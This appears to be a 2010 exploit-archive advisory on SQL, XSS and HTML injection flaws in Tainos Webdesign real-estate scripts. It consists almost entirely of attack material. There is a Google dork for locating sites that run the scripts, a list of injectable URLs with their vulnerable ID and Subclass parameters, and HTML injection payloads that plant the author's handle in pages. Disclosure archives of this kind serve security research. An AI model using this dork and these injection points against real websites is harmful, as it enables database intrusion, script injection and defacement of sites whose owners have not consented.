[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
# Published : 2010-05-17
# Author : CoBRa_21
# Previous Title : DB[CMS] Sql Injection Vulnerability
# Next Title : Joomla Component com_crowdsource SQL Injection
-------------------------------------------------------------------------------------------
Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Home: http://www.tainos-webdesign.com
Dork: intext:"? Tainos Webdesign"
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/propertylux.php?ID=1 (SQL)
http://localhost/[path]/property.php?ID=199 (SQL)
-------------------------------------------------------------------------------------------
XSS Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=
http://localhost/[path]/class.php?Class=Sales&Subclass=
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=
-------------------------------------------------------------------------------------------
HTML Injection:
http://localhost/[path]/class.php?Class=Rental&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/class.php?Class=Sales&Subclass=<font color=red size=15>CoBRa_21</font>
http://localhost/[path]/classlux.php?Class=Luxury&Subclass=<font color=red size=15>CoBRa_21</font>
-------------------------------------------------------------------------------------------